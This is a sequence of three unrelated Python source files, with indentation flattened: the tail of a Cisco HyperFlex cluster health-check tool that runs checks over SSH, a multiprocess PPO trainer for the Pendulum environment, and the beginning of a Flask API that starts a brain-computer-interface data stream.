fh.write("1) If upgrading to HX 4.0(2a), please review the following link and perform workaround – https://tinyurl.com/wc7j5qp" + "\r\n")
fh.write("2) Please check the status of Compute nodes manually, script only verifies the config on the converged nodes." + "\r\n")
fh.write("3) Hypercheck doesnot perform FAILOVER TEST, so please ensure that the upstream is configured for network connectivity for JUMBO or NORMAL MTU size as needed." + "\r\n")
if sedNote:
fh.write("4) SED Drive Failure Might Cause Cluster to Go Down - https://www.cisco.com/c/en/us/support/docs/field-notices/702/fn70234.html" + "\r\n")
fh.write("\r\n")
print("\r\nMain Report File: " + filename)
log_stop()
create_tar_file()
print("\r\nRelease Notes:")
print("\rhttps://www.cisco.com/c/en/us/support/hyperconverged-systems/hyperflex-hx-data-platform-software/products-release-notes-list.html")
print("\r\nUpgrade Guides:")
print("\rhttps://www.cisco.com/c/en/us/support/hyperconverged-systems/hyperflex-hx-data-platform-software/products-installation-guides-list.html")
print("\r\nNote:")
print("\r1) If upgrading to HX 4.0(2a), please review the following link and perform workaround – https://tinyurl.com/wc7j5qp")
print("\r2) Please check the status of Compute nodes manually, script only verifies the config on the converged nodes.")
print("\r3) Hypercheck doesnot perform FAILOVER TEST, so please ensure that the upstream is configured for network connectivity for JUMBO or NORMAL MTU size as needed.")
if sedNote:
print("\r4) SED Drive Failure Might Cause Cluster to Go Down - https://www.cisco.com/c/en/us/support/docs/field-notices/702/fn70234.html")
print("\r\n")
def create_json_file(clusterName, clusterType):
filename = "HX_Tool_Summary.json"
data = {}
data["Cluster Name"] = str(clusterName.strip())
data["Cluster Type"] = str(clusterType.strip())
data["HX Checks"] = testsum
data["NW Checks"] = nwtestsum
with open(filename, "w") as fh:
json.dump(data, fh)
def create_tar_file():
file = dir_name + ".tar"
try:
os.chdir("..")
tar = tarfile.open(file, "w")
tar.add(dir_name)
tar.close()
print("Report tar file: " + str(file))
# Copy file to /var/log/springpath
path = r"/var/log/springpath/"
shutil.copy(file, path)
print("Report file copied to path: /var/log/springpath")
except Exception as e:
print("Not able to create the Report tar file")
print(e)
###############################################################################
# Main Starts here
###############################################################################
if __name__ == "__main__":
# HX Script version
# Arguments passed
arg = ""
if len(sys.argv) > 1:
try:
arg = (sys.argv[1]).lower()
except Exception:
pass
if arg == "-h" or arg == "--help" or arg == "help":
print("\n\t\t HX Health Check " + str(toolversion))
print("\nSupported HX Versions: 1.8, 2.6, 3.0, 3.5, 4.0")
print("\nPre-requisite: Script needs HX and ESXi root password information to check all conditions.")
print("\nHX Health Check script will do below checks on each cluster nodes:")
print("\t 1) Cluster services check")
print("\t 2) ZooKeeper & Exhibitor check")
print("\t 3) HDD health check")
print("\t 4) Pre-Upgrade Check")
print("\t 5) Network check ")
print("\nFor Test Summary report run as below:")
print("\t python HXTool.py")
print("\nFor Test detail report run as below:")
print("\t python HXTool.py detail\n")
sys.exit(0)
# Log file declaration
log_file = "HX_Tool_" + get_date_time() + ".log"
log_name = "HX_TOOL"
log_start(log_file, log_name, INFO)
# RSA_KEY_FILE = "/etc/ssh/ssh_host_rsa_key"
print("\n\t\t HX Health Check " + str(toolversion))
log_msg(INFO, "HX Health Check " + str(toolversion) + "\r")
hxcdt = datetime.datetime.now()
bdt = datetime.datetime.strptime(builddate, "%Y-%m-%d")
ndays = (hxcdt - bdt).days
if int(ndays) >= 30:
print("\n The script in use might be old. Please check and confirm that this is the latest script on Github.")
# HX Controller parameter
print("\nPlease enter below info of HX-Cluster:")
hxusername = "root"
log_msg(INFO, "Username: " + hxusername + "\r")
hxpassword = getpass.getpass("Enter the HX-Cluster Root Password: ")
esxpassword = getpass.getpass("Enter the ESX Root Password: ")
port = 22
log_msg(INFO, "Port: " + str(port) + "\r")
time_out = 30 # Number of seconds for timeout
log_msg(INFO, "Timeout: " + str(time_out) + "\r")
# Get Host IP Address of eth1
# cmd = "hostname -i"
cmd = "ifconfig eth1 | grep 'inet addr:' | cut -d: -f2| cut -d' ' -f1"
op = runcmd(cmd)
hostip = op.strip()
log_msg(INFO, "Host IP Address: " + str(hostip) + "\r")
# Get Host Path
cmd = "pwd"
op = runcmd(cmd)
hostpath = op.strip()
log_msg(INFO, "Host Path: " + str(hostpath) + "\r")
log_msg(INFO, "Argument: " + str(arg) + "\r")
if arg == "detail":
print("Option: " + str(arg))
# Get Cluster Name
print("")
clustername = ""
clusterType = ""
cmd = "stcli cluster storage-summary --detail | grep -i name | cut -d: -f2"
op = runcmd(cmd)
if "Not able to run the command" in op:
pass
else:
clustername = op.strip()
log_msg(INFO, "Cluster Name: " + str(clustername) + "\r")
log_msg("", "Cluster Name: " + str(clustername) + "\r")
# Get Cluster Type
cmd = "stcli cluster info | grep -i clustertype | head -1 | cut -d: -f2"
op = runcmd(cmd)
if op:
clusterType = op.strip()
# Check Stretch Cluster
stcnt = ""
cmd = "find / -name stretch* | wc -l"
cop = runcmd(cmd)
if "Not able to run the command" in cop:
pass
else:
stcnt = cop.strip()
if stcnt.isdigit():
if int(stcnt) > 0:
clusterType = "STRETCH_CLUSTER"
log_msg(INFO, "Cluster Type: " + str(clusterType) + "\r")
if clusterType:
print("")
log_msg("", "Cluster Type: " + str(clusterType).upper() + "\r")
# Set Stretch Cluster
stretchCluster = False
if "stretch" in clusterType.lower():
stretchCluster = True
# Get Controller Mgmnt IP Addresses
# Old cmd used to get controller IP Addresses
# cmd1 = "stcli cluster info | grep -i stctl_mgmt -n1 | grep -i addr"
# Get eth1 ips
cmd = "sysmtool --ns cluster --cmd info | grep -i uuid"
op = runcmd(cmd)
ips = []
if op:
ips = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", op)
if not ips:
print("HX Nodes IP Addresses are not found")
sys_exit(0)
ips.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
log_msg(INFO, "IP Adresses: " + ", ".join(ips) + "\r")
eth1_list = list(ips)
eth1_list.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
# Get all hostnames
hostd = {}
subreportfiles = []
print("")
# global sedflag
#############################################################
# Get Controller eth0 ips or storage controller ips
hxips = []
eth0_list = []
# Create instance of SSHClient object
client = paramiko.SSHClient()
# Automatically add untrusted hosts (Handle SSH Exception for unknown host)
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Check HX and ESX root Password
check_psd(ips, hxusername, hxpassword, esxpassword, time_out)
# Get all hostnames and HX IP address using threads
# <hostname -i> cmd is not working
try:
ipthreads = []
for ip in ips:
th = threading.Thread(target=thread_geteth0ip, args=(ip, hxusername, hxpassword, time_out,))
th.start()
time.sleep(12)
ipthreads.append(th)
for t in ipthreads:
t.join()
hxips.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
except Exception:
hxips = eth1_list
hxips = eth1_list
log_msg(INFO, "HX IP Adresses: " + ", ".join(hxips) + "\r")
#############################################################
# Create instance of SSHClient object
client = paramiko.SSHClient()
# Automatically add untrusted hosts (Handle SSH Exception for unknown host)
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Get hostname, eth1, esxip using threads
threads = []
for ip in hxips:
th = threading.Thread(target=thread_sshconnect, args=(ip, hxusername, hxpassword, time_out,))
th.start()
time.sleep(35)
threads.append(th)
for t in threads:
t.join()
# Get all timestamp using threads
tsthreads = []
tsstart = datetime.datetime.now().replace(microsecond=0)
for ip in hxips:
th = threading.Thread(target=thread_timestamp, args=(ip, hxusername, hxpassword, time_out,))
th.start()
time.sleep(5)
tsthreads.append(th)
for t in tsthreads:
t.join()
tsend = datetime.datetime.now().replace(microsecond=0)
timedelay = (tsend - tsstart).seconds
log_msg(INFO, "Time delay for Timestamp check: " + str(timedelay) + "\r")
ht = PrettyTable(hrules=ALL)
ht.field_names = ["Nodes", "IP Address", "HostName"]
ht.align = "l"
for i, ip in enumerate(hxips):
ht.add_row([i + 1, hostd[ip].get("eth0", ""), hostd[ip].get("hostname", "")])
print("\r\nHX Cluster Nodes:")
print(ht)
print("")
# NTP Date check
# timestamp should be the same on all storage controllers
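# Timestamps were collected sequentially over SSH, so differences up to the measured
# collection window (timedelay) are tolerated; a larger gap between any two nodes fails the check.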
dtresult = ""
for ip in hostd.keys():
hostd[ip]["date check"] = dtresult
try:
d = hostd[ip]["date"]
if d == "":
dtresult = "FAIL"
else:
ipdt = datetime.datetime.strptime(d, "%m/%d/%y %H:%M:%S")
for jp in hostd.keys():
if ip == jp:
continue
else:
jd = hostd[jp]["date"]
if jd == "":
dtresult = "FAIL"
continue
else:
jpdt = datetime.datetime.strptime(jd, "%m/%d/%y %H:%M:%S")
if ipdt == jpdt:
dtresult = "PASS"
continue
elif ipdt > jpdt:
t = (ipdt - jpdt).seconds
else:
t = (jpdt - ipdt).seconds
if t > timedelay:
dtresult = "FAIL"
break
else:
dtresult = "PASS"
hostd[ip]["date check"] = dtresult
except Exception:
continue
# NTP source ip address check
# it should be same on all storage controllers
ntpsrccheck = ""
for ip in hostd.keys():
ipntp = hostd[ip]["ntp source"]
if ipntp == "":
ntpsrccheck = "FAIL"
else:
for jp in hostd.keys():
if ip == jp:
continue
elif ipntp == hostd[jp]["ntp source"]:
ntpsrccheck = "PASS"
else:
ntpsrccheck = "FAIL"
break
hostd[ip].update({"ntp source check": ntpsrccheck})
# Check package & versions on each controller
packagecheck = ""
# First will count no of packages on each controller
for ip in hostd.keys():
ipkgl = hostd[ip]["package & versions"]
if ipkgl:
cnt = len(ipkgl)
for jp in hostd.keys():
if ip == jp:
continue
elif cnt == len(hostd[jp]["package & versions"]):
packagecheck = "PASS"
else:
packagecheck = "FAIL"
break
break
else:
packagecheck = "FAIL"
break
# Now will check package and version on each controller
if packagecheck == "PASS":
for ip in hostd.keys():
ipkgl = hostd[ip]["package & versions"]
for pk in ipkgl:
pkg = ""
ver = ""
l = pk.split()
try:
pkg = l[0]
ver = l[1]
except Exception:
pass
for jp in hostd.keys():
if ip == jp:
continue
elif packagecheck == "FAIL":
break
else:
jpkgl = hostd[jp]["package & versions"]
for line in jpkgl:
if pkg in line:
if ver in line:
packagecheck = "PASS"
else:
packagecheck = "FAIL"
break
if packagecheck == "FAIL":
break
if packagecheck == "FAIL":
break
for ip in hostd.keys():
hostd[ip]["check package & versions"] = packagecheck
# check Iptables count
# check for at least 44 and same across all nodes
iptst = ""
for ip in hostd.keys():
try:
ipcnt = int(hostd[ip]["iptables count"])
except Exception:
continue
if ipcnt < 44:
iptst = "FAIL"
break
elif iptst == "FAIL":
break
else:
for jp in hostd.keys():
try:
jpcnt = int(hostd[jp]["iptables count"])
except Exception:
continue
if jpcnt < 44:
iptst = "FAIL"
break
elif ip == jp:
continue
elif ipcnt == jpcnt:
iptst = "PASS"
else:
iptst = "FAIL"
break
for ip in hostd.keys():
hostd[ip]["check iptables"] = iptst
# Check keystore file
keystoreCheck = ""
keystoreList = []
for ip in hostd.keys():
keystore = hostd[ip]["keystore"]
if keystore not in keystoreList:
keystoreList.append(keystore)
if len(keystoreList) == 1:
keystoreCheck = "PASS"
else:
keystoreCheck = "FAIL"
for ip in hostd.keys():
hostd[ip]["check keystore"] = keystoreCheck
# Check whether the hxuser password contains special characters
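# getEsxConnectionInfo.sh exposes the stored hxuser password; passwords containing "{{",
# "{#", "{%", "//", a doubled backslash, a single quote or a double quote are flagged FAIL.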
hxpsdcheck = ""
try:
cmd = "/opt/springpath/storfs-support/getEsxConnectionInfo.sh"
op = runcmd(cmd, False)
if "password" in op:
p = re.search(r"password\":\s+\"(.+)\"", op)
if p:
psd = p.group(1)
if re.search(r"(\{[\{\#\%])|//|\\\\|'|\"", psd):
hxpsdcheck = "FAIL"
else:
hxpsdcheck = "PASS"
except Exception:
pass
for ip in hostd.keys():
hostd[ip]["check hxuser password"] = hxpsdcheck
# Get ESX IPs, vmk1 ips
esx_hostsl = []
for ip in hostd.keys():
esxip = hostd[ip].get("esxip", "")
if esxip != "":
esx_hostsl.append(esxip)
if esx_hostsl:
try:
esx_hostsl.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
except Exception:
pass
esx_vmotion = {}
vmk1_mtu = {}
vmk1_list = []
for ip in esx_hostsl:
esx_vmotion[str(ip)] = dict.fromkeys(["vmotion", "vmkip", "mtu"], "")
# Get all vmk1 using threads
threads = []
for ip in hostd.keys():
th = threading.Thread(target=get_vmk1, args=(ip, hxusername, esxpassword, time_out,))
th.start()
time.sleep(5)
threads.append(th)
for t in threads:
t.join()
vmk1_list = [v for v in vmk1_list if v != " "]
if vmk1_list:
try:
vmk1_list.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
except Exception:
pass
log_msg(INFO, "Eth1 IP Adresses: " + ", ".join(eth1_list) + "\r")
log_msg(INFO, "ESX IP Adresses: " + ", ".join(esx_hostsl) + "\r")
log_msg(INFO, "vmk1 IP Adresses: " + ", ".join(vmk1_list) + "\r")
# Check the below things on each controller
nwdetail = OrderedDict()
cvm = {}
testsum = OrderedDict()
testdetail = OrderedDict()
nwtestsum = OrderedDict()
nwtestdetail = OrderedDict()
# Bug details table
bugs = {
"HX down": "HX cluster goes down during the UCS infra upgrade. This is because of the default failback delay interval(10sec) on ESXi." + "\nDefault Value - 10sec" + "\nModify to - 30sec"
}
bgt = PrettyTable(hrules=ALL)
bgt.field_names = ["Bug", "Description"]
bgt.align = "l"
for k, v in bugs.items():
bgt.add_row([k, v])
#############################################################
# Check on all HX Controller
# Create instance of SSHClient object
for ip in hxips:
try:
print("\r\nHX Controller: " + str(ip))
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
# log_msg("", msg)
testsum[ip] = OrderedDict()
testdetail[ip] = OrderedDict()
# 1. Cluster services check
# Progressbar
pbar = ProgressBarThread()
pbar.start("Cluster services check ")
log_msg(INFO, "Progressbar Started" + "\r")
cluster_services_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# 2. ZooKeeper and Exhibitor check
# Progressbar
pbar = ProgressBarThread()
pbar.start("ZooKeeper & Exhibitor check")
log_msg(INFO, "Progressbar Started" + "\r")
zookeeper_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# 3. HDD health check
# Progressbar
pbar = ProgressBarThread()
pbar.start("HDD health check ")
log_msg(INFO, "Progressbar Started" + "\r")
hdd_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# 4. Pre-Upgrade Check
# Progressbar
pbar = ProgressBarThread()
pbar.start("Pre-Upgrade Check ")
log_msg(INFO, "Progressbar Started" + "\r")
pre_upgrade_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# 5. Network Summary
# Progressbar
pbar = ProgressBarThread()
pbar.start("Network check ")
log_msg(INFO, "Progressbar Started" + "\r")
network_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# Close connection
client.close()
# Create report file
#create_sub_report(ip)
except KeyboardInterrupt:
sys_exit(0)
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
# log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
# sys_exit(0)
# stop progressbar
pbar.stop("INCOMPLETE")
log_msg(INFO, "Progressbar Stopped" + "\r")
continue
###############################################################
# Display the test result
display_result()
# Create Test Summary json file
create_json_file(clustername, clusterType)
# Create Main Report File
create_main_report(clustername, clusterType)
# End
sys.exit(0)
|
ppo_continuous_multiprocess2.py
|
'''
Multi-processing version of PPO continuous v2
'''
import math
import random
import gym
import numpy as np
import torch
torch.multiprocessing.set_start_method('forkserver', force=True) # critical to make multiprocessing work
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions import Normal, MultivariateNormal
from IPython.display import clear_output
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import display
from reacher import Reacher
import argparse
import time
import torch.multiprocessing as mp
from torch.multiprocessing import Process
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import threading as td
GPU = True
device_idx = 0
if GPU:
device = torch.device("cuda:" + str(device_idx) if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(device)
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()
##################### hyper parameters ####################
ENV_NAME = 'Pendulum-v0' # environment name
RANDOMSEED = 2 # random seed
EP_MAX = 1000 # total number of episodes for training
EP_LEN = 200 # total number of steps for each episode
GAMMA = 0.9 # reward discount
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
BATCH = 256 # update batchsize
A_UPDATE_STEPS = 10 # actor update steps
C_UPDATE_STEPS = 10 # critic update steps
EPS = 1e-8 # numerical residual
MODEL_PATH = 'model/ppo_multi'
NUM_WORKERS=2 # or: mp.cpu_count()
ACTION_RANGE = 2. # action range of the unnormalized env; if the env is wrapped with NormalizedActions, this should be 1.
METHOD = [
dict(name='kl_pen', kl_target=0.01, lam=0.5), # KL penalty
dict(name='clip', epsilon=0.2), # Clipped surrogate objective, find this is better
][1] # choose the method for optimization
############################### PPO ####################################
class ValueNetwork(nn.Module):
def __init__(self, state_dim, hidden_dim, init_w=3e-3):
super(ValueNetwork, self).__init__()
self.linear1 = nn.Linear(state_dim, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
self.linear4 = nn.Linear(hidden_dim, 1)
# weights initialization
# self.linear4.weight.data.uniform_(-init_w, init_w)
# self.linear4.bias.data.uniform_(-init_w, init_w)
def forward(self, state):
x = F.relu(self.linear1(state))
# x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
x = self.linear4(x)
return x
class PolicyNetwork(nn.Module):
def __init__(self, num_inputs, num_actions, hidden_dim, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):
super(PolicyNetwork, self).__init__()
self.log_std_min = log_std_min
self.log_std_max = log_std_max
self.linear1 = nn.Linear(num_inputs, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
# self.linear4 = nn.Linear(hidden_dim, hidden_dim)
self.mean_linear = nn.Linear(hidden_dim, num_actions)
# self.mean_linear.weight.data.uniform_(-init_w, init_w)
# self.mean_linear.bias.data.uniform_(-init_w, init_w)
self.log_std_linear = nn.Linear(hidden_dim, num_actions)
# self.log_std_linear.weight.data.uniform_(-init_w, init_w)
# self.log_std_linear.bias.data.uniform_(-init_w, init_w)
self.num_actions = num_actions
self.action_range = action_range
def forward(self, state):
x = F.relu(self.linear1(state))
x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
# x = F.relu(self.linear4(x))
mean = self.action_range * torch.tanh(self.mean_linear(x))
log_std = self.log_std_linear(x)
log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)
std = log_std.exp()
return mean, std
def get_action(self, state, deterministic=False):
state = torch.FloatTensor(state).unsqueeze(0).to(device)
mean, std = self.forward(state)
if deterministic:
action = mean
else:
pi = torch.distributions.Normal(mean, std)
action = pi.sample()
action = torch.clamp(action, -self.action_range, self.action_range)
return action.squeeze(0)
def sample_action(self,):
a=torch.FloatTensor(self.num_actions).uniform_(-1, 1)
return a.numpy()
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
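# Example (illustrative): for Pendulum-v0 with low = -2 and high = 2, a normalized
# action of 0.5 maps to -2 + 1.5 * 0.5 * 4 = 1.0 before clipping.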
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
class PPO(object):
'''
PPO class
'''
def __init__(self, state_dim, action_dim, hidden_dim=128, a_lr=3e-4, c_lr=3e-4):
self.actor = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.critic = ValueNetwork(state_dim, hidden_dim).to(device)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=A_LR)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=C_LR)
print(self.actor, self.critic)
self.state_buffer, self.action_buffer = [], []
self.reward_buffer, self.cumulative_reward_buffer = [], []
def a_train(self, s, a, adv, oldpi):
'''
Update policy network
:param state: state batch
:param action: action batch
:param adv: advantage batch
:param old_pi: old pi distribution
:return:
'''
mu, std = self.actor(s)
pi = Normal(mu, std)
# ratio = torch.exp(pi.log_prob(a) - oldpi.log_prob(a)) # sometimes give nan
ratio = torch.exp(pi.log_prob(a)) / (torch.exp(oldpi.log_prob(a)) + EPS)
surr = ratio * adv
if METHOD['name'] == 'kl_pen':
lam = METHOD['lam']
kl = torch.distributions.kl.kl_divergence(oldpi, pi)
kl_mean = kl.mean()
aloss = -((surr - lam * kl).mean())
else: # clipping method, find this is better
aloss = -torch.mean(torch.min(surr, torch.clamp(ratio, 1. - METHOD['epsilon'], 1. + METHOD['epsilon']) * adv))
self.actor_optimizer.zero_grad()
aloss.backward()
self.actor_optimizer.step()
if METHOD['name'] == 'kl_pen':
return kl_mean
def c_train(self, cumulative_r, s):
'''
Update critic network
:param cumulative_r: cumulative reward
:param s: state
:return: None
'''
v = self.critic(s)
advantage = cumulative_r - v
closs = (advantage**2).mean()
self.critic_optimizer.zero_grad()
closs.backward()
self.critic_optimizer.step()
def update(self):
'''
Update parameters with the constraint of KL divergence
:return: None
'''
s = torch.Tensor(self.state_buffer).to(device)
a = torch.Tensor(self.action_buffer).to(device)
r = torch.Tensor(self.cumulative_reward_buffer).to(device)
with torch.no_grad():
mean, std = self.actor(s)
pi = torch.distributions.Normal(mean, std)
adv = r - self.critic(s)
# adv = (adv - adv.mean())/(adv.std()+1e-6) # sometimes helpful
# update actor
if METHOD['name'] == 'kl_pen':
for _ in range(A_UPDATE_STEPS):
kl = self.a_train(s, a, adv, pi)
if kl > 4 * METHOD['kl_target']: # this is in google's paper
break
if kl < METHOD['kl_target'] / 1.5: # adaptive lambda, this is in OpenAI's paper
METHOD['lam'] /= 2
elif kl > METHOD['kl_target'] * 1.5:
METHOD['lam'] *= 2
METHOD['lam'] = np.clip(
METHOD['lam'], 1e-4, 10
) # sometimes explode, this clipping is MorvanZhou's solution
else: # clipping method, find this is better (OpenAI's paper)
for _ in range(A_UPDATE_STEPS):
self.a_train(s, a, adv, pi)
# update critic
for _ in range(C_UPDATE_STEPS):
self.c_train(r, s)
self.state_buffer.clear()
self.action_buffer.clear()
self.cumulative_reward_buffer.clear()
self.reward_buffer.clear()
def choose_action(self, s, deterministic=False):
'''
Choose action
:param s: state
:return: clipped act
'''
a = self.actor.get_action(s, deterministic)
return a.detach().cpu().numpy()
def get_v(self, s):
'''
Compute value
:param s: state
:return: value
'''
s = s.astype(np.float32)
if s.ndim < 2: s = s[np.newaxis, :]
s = torch.FloatTensor(s).to(device)
return self.critic(s).squeeze(0).detach().cpu().numpy()
def save_model(self, path):
torch.save(self.actor.state_dict(), path+'_actor')
torch.save(self.critic.state_dict(), path+'_critic')
def load_model(self, path):
self.actor.load_state_dict(torch.load(path+'_actor'))
self.critic.load_state_dict(torch.load(path+'_critic'))
self.actor.eval()
self.critic.eval()
def store_transition(self, state, action, reward):
"""
Store state, action, reward at each step
:param state:
:param action:
:param reward:
:return: None
"""
self.state_buffer.append(state)
self.action_buffer.append(action)
self.reward_buffer.append(reward)
def finish_path(self, next_state, done):
"""
Calculate cumulative reward
:param next_state:
:return: None
"""
if done:
v_s_ = 0
else:
v_s_ = self.critic(torch.Tensor([next_state]).to(device)).cpu().detach().numpy()[0, 0]
discounted_r = []
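# Rewards are accumulated backwards: e.g. with GAMMA = 0.9, rewards [1, 1] and a
# terminal next state (v_s_ = 0), the resulting returns are [1.9, 1.0].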
for r in self.reward_buffer[::-1]:
v_s_ = r + GAMMA * v_s_ # no future reward if next state is terminal
discounted_r.append(v_s_)
discounted_r.reverse()
discounted_r = np.array(discounted_r)[:, np.newaxis]
self.cumulative_reward_buffer.extend(discounted_r)
self.reward_buffer.clear()
def ShareParameters(adamoptim):
''' share parameters of Adamoptimizers for multiprocessing '''
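# The Adam running averages (exp_avg, exp_avg_sq) normally live in each process's
# private memory; moving them into shared memory lets every worker update the same
# optimizer statistics, mirroring how the model weights are shared via
# share_memory() in main().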
for group in adamoptim.param_groups:
for p in group['params']:
state = adamoptim.state[p]
# initialize: have to initialize here, or else cannot find
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
# share in memory
state['exp_avg'].share_memory_()
state['exp_avg_sq'].share_memory_()
def plot(rewards):
clear_output(True)
plt.figure(figsize=(10,5))
plt.plot(rewards)
plt.savefig('ppo_multi.png')
# plt.show()
plt.clf()
def worker(id, ppo, rewards_queue):
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
all_ep_r = []
for ep in range(EP_MAX):
s = env.reset()
ep_r = 0
t0 = time.time()
for t in range(EP_LEN): # in one episode
# env.render()
a = ppo.choose_action(s)
s_, r, done, _ = env.step(a)
ppo.store_transition(s, a, (r+8)/8) # useful for pendulum
s = s_
ep_r += r
# update ppo
if len(ppo.state_buffer) == BATCH:
ppo.finish_path(s_, done)
ppo.update()
if done:
break
ppo.finish_path(s_, done)
if ep == 0:
all_ep_r.append(ep_r)
else:
all_ep_r.append(all_ep_r[-1] * 0.9 + ep_r * 0.1)
if ep%50==0:
ppo.save_model(MODEL_PATH)
print(
'Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
ep, EP_MAX, ep_r,
time.time() - t0
)
)
rewards_queue.put(ep_r)
ppo.save_model(MODEL_PATH)
env.close()
def main():
# reproducible
# env.seed(RANDOMSEED)
np.random.seed(RANDOMSEED)
torch.manual_seed(RANDOMSEED)
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
ppo = PPO(state_dim, action_dim, hidden_dim=128)
if args.train:
ppo.actor.share_memory()
ppo.critic.share_memory()
ShareParameters(ppo.actor_optimizer)
ShareParameters(ppo.critic_optimizer)
rewards_queue=mp.Queue() # used for get rewards from all processes and plot the curve
processes=[]
rewards=[]
for i in range(NUM_WORKERS):
process = Process(target=worker, args=(i, ppo, rewards_queue)) # the args contain both shared and non-shared objects
process.daemon=True # all processes are closed when the main process stops
processes.append(process)
[p.start() for p in processes]
while True: # keep getting the episode reward from the queue
r = rewards_queue.get()
if r is not None:
if len(rewards) == 0:
rewards.append(r)
else:
rewards.append(rewards[-1] * 0.9 + r * 0.1)
else:
break
if len(rewards)%20==0 and len(rewards)>0:
plot(rewards)
[p.join() for p in processes] # finished at the same time
ppo.save_model(MODEL_PATH)
if args.test:
ppo.load_model(MODEL_PATH)
while True:
s = env.reset()
for i in range(EP_LEN):
env.render()
s, r, done, _ = env.step(ppo.choose_action(s, True))
if done:
break
if __name__ == '__main__':
main()
|
api.py
|
from datetime import datetime
from functools import wraps
from flask import Blueprint, request, current_app
import os
import dcp.mp.shared as shared
from dcp import db
from collections import deque
import time
from dcp.models.data import CollectedData
from dcp.models.collection import BCICollection
bp = Blueprint('api', __name__, url_prefix='/api')
def validate_json(*fields):
"""Decorator to validate JSON body.
See https://flask.palletsprojects.com/en/2.0.x/patterns/viewdecorators/.
"""
def decorator(f):
@wraps(f)
def decorated(*args, **kwargs):
if not request.is_json or not request.json:
return {}, 400
missing_fields = fields - request.json.keys()
if len(missing_fields) > 0:
return {'error_message':
f'Missing fields: {", ".join(missing_fields)}'}, 400
return f(*args, **kwargs)
return decorated
return decorator
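# Example usage (illustrative only; this route and its fields are hypothetical and
# not part of the original API):
#
#   @bp.route('/example', methods=['POST'])
#   @validate_json('character', 'frequency')
#   def example():
#       # both fields are guaranteed to be present here
#       return {'character': request.json['character']}, 200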
@bp.route("/openbci/start", methods=['POST'])
def openbci_start():
# TODO handle case where json is empty and return error
if request.json is None:
return {"error_message": "A json object with attributed 'collector_name' must be submitted"}, 400
try:
collector_name = request.json["collector_name"]
current_app.logger.info(f"Current collect name is: {collector_name}.")
except KeyError as e:
return {'error_message': f'{e}. The \"collector_name\" attribute is missing from the json.'}, 400
# use a separate process to stream BCI data
from dcp.bci.stream import stream_bci_api
from multiprocessing import Process
with current_app.app_context():
# Although the subprocess dict gets initialized inside this scope, it will persist
# because bci_processes_states keeps a reference to this subprocess_dict
shared.initialize_queue()
subprocess_dict = shared.get_manager().dict({
'character': None,
'phase': None,
'frequency': None,
'collection_id': None,
'bci_config': None,
'state': None
})
# only pass this subprocess dict to ensure that locks are not too contentious
p = Process(target=stream_bci_api, args=(subprocess_dict,shared.queue))
# need to start process before referencing it to obtain the right process_id
p.start()
shared.get_bci_processes_states()[p.pid] = subprocess_dict
BCI_CONNECT_TIMEOUT = 10
start = time.time()
while subprocess_dict['state'] != 'ready' or subprocess_dict['bci_config'] is None:
current_app.logger.info("Trying to resolve BCI stream.")
time.sleep(1)
if (time.time() - start) > BCI_CONNECT_TIMEOUT:
current_app.logger.info("BCI connection timeout, failed to resolve BCI stream.")
p.kill()
return {"error_message": "Server timeout"}, 408
collection = BCICollection(bci_configuration=subprocess_dict['bci_config'],collector_name=collector_name)
db.session.add(collection)
db.session.commit()
subprocess_dict['collection_id'] = collection.id
# once the subprocess is ready, return from call
return {"data": {"pid": p.pid}}, 201
@bp.route('/openbci/<int:process_id>/collect/start', methods=['POST'])
